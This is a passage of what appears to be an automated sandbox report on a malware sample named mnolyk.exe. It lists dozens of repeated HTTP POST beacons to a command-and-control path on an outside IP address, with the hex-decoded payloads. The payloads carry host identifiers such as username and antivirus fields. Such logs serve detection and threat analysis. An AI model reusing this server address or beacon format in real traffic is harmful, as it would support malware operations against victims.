                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:10.548284054 CET642INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:10 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          488192.168.2.65021362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:10.733288050 CET643OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:10.797100067 CET643INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:10 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          489192.168.2.65021462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:10.972258091 CET644OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:11.035756111 CET644INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:10 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          49192.168.2.64976862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:02.811172962 CET162OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:02.876564026 CET162INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:02 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          490192.168.2.65021562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:11.200841904 CET645OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:11.265623093 CET645INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          491192.168.2.65021662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:11.470014095 CET646OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:11.534045935 CET646INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          492192.168.2.65021762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:11.704054117 CET647OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:11.768791914 CET647INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          493192.168.2.65021862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:11.936212063 CET648OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:11.999941111 CET648INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:11 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          494192.168.2.65021962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:12.179096937 CET649OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:12.246732950 CET649INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          495192.168.2.65022062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:12.442627907 CET650OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:12.506438971 CET650INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          496192.168.2.65022162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:12.688306093 CET650OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:12.750021935 CET651INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          497192.168.2.65022262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:12.933465004 CET652OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:12.994988918 CET652INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          498192.168.2.65022362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:13.167789936 CET653OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:13.231307030 CET653INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          499192.168.2.65022462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:13.408042908 CET654OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:13.472860098 CET654INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          5192.168.2.64972362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:52.073818922 CET110OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:52.141586065 CET110INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:52 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          50192.168.2.64976962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:03.043961048 CET163OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:03.107919931 CET163INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          500192.168.2.65022562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:13.640810013 CET655OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:13.704272985 CET655INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          501192.168.2.65022662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:13.874521971 CET656OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:13.938580036 CET656INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          502192.168.2.65022762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:14.108352900 CET657OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:14.171869040 CET657INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:14 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          503192.168.2.65022862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:14.349981070 CET658OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:14.415443897 CET658INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:14 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          504192.168.2.65022962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:14.593388081 CET659OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:14.655284882 CET659INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:14 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          505192.168.2.65023062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:14.875718117 CET660OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
